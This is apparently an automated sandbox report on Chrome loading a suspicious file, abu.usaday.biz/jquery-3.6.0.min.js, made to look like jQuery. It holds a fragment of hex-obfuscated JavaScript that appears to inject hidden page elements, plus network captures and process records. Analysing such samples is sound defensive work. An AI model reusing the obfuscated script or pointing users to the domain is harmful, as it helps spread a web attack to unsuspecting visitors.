                      Data Ascii: x3A\x20\x31\x30\x30\x25\x3B\x20\x63\x75\x72\x73\x6F\x72\x3A\x20\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x61\x3E","\x6F\x6E\x63\x6C\x69\x63\x6B","\x64\x69\x73\x70\x6C\x61\x79","\x6E\x6F\x6E\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\


                      Session ID: 6, Source IP: 192.168.2.3, Source Port: 49717, Destination IP: 172.67.148.211, Destination Port: 443, Process: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp: 2023-10-10 03:16:13 UTC, kBytes transferred: 8, Direction: OUT
                      GET /favicon.ico HTTP/1.1
                      Host: abu.usaday.biz
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://abu.usaday.biz/jquery-3.6.0.min.js
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9


                      Session ID: 7, Source IP: 172.67.148.211, Source Port: 443, Destination IP: 192.168.2.3, Destination Port: 49717, Process: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp: 2023-10-10 03:16:14 UTC, kBytes transferred: 9, Direction: IN
                      HTTP/1.1 404 Not Found
                      Date: Tue, 10 Oct 2023 03:16:14 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Cache-Control: max-age=14400
                      CF-Cache-Status: MISS
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u9mxTix3ZJeEJl1m3ga2mkiabeNsZGF4WOpN8lPQs64Iu3E%2BSd%2BCKY9%2FChjT5hZ8PNITU8eUe2meCLRVub3mm%2BWJxmVUkgsGuKltOtOpbj9tUQdvM2x4uKtaOCrzYJRXwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 813bb413ec3c7c83-LAX
                      alt-svc: h3=":443"; ma=86400
                      Timestamp: 2023-10-10 03:16:14 UTC, kBytes transferred: 9, Direction: IN
                      Data Ascii: 244<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->...
                      Timestamp: 2023-10-10 03:16:14 UTC, kBytes transferred: 10, Direction: IN
                      Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID: 8, Source IP: 192.168.2.3, Source Port: 49718, Destination IP: 35.190.80.1, Destination Port: 443, Process: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp: 2023-10-10 03:16:15 UTC, kBytes transferred: 10, Direction: OUT
                      OPTIONS /report/v3?s=u9mxTix3ZJeEJl1m3ga2mkiabeNsZGF4WOpN8lPQs64Iu3E%2BSd%2BCKY9%2FChjT5hZ8PNITU8eUe2meCLRVub3mm%2BWJxmVUkgsGuKltOtOpbj9tUQdvM2x4uKtaOCrzYJRXwg%3D%3D HTTP/1.1
                      Host: a.nel.cloudflare.com
                      Connection: keep-alive
                      Origin: https://abu.usaday.biz
                      Access-Control-Request-Method: POST
                      Access-Control-Request-Headers: content-type
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9


                      Session ID: 9, Source IP: 35.190.80.1, Source Port: 443, Destination IP: 192.168.2.3, Destination Port: 49718, Process: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp: 2023-10-10 03:16:15 UTC, kBytes transferred: 10, Direction: IN
                      HTTP/1.1 200 OK
                      Content-Length: 0
                      access-control-max-age: 86400
                      access-control-allow-methods: POST, OPTIONS
                      access-control-allow-origin: *
                      access-control-allow-headers: content-type, content-length
                      date: Tue, 10 Oct 2023 03:16:14 GMT
                      Via: 1.1 google
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      Target ID:0
                      Start time:05:16:08
                      Start date:10/10/2023
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                      Imagebase:0x7ff7c89f0000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:05:16:09
                      Start date:10/10/2023
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2040,i,1388585368886845847,6482679812835657815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff7c89f0000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:8
                      Start time:05:16:11
                      Start date:10/10/2023
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "http://abu.usaday.biz/jquery-3.6.0.min.js
                      Imagebase:0x7ff7c89f0000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      No disassembly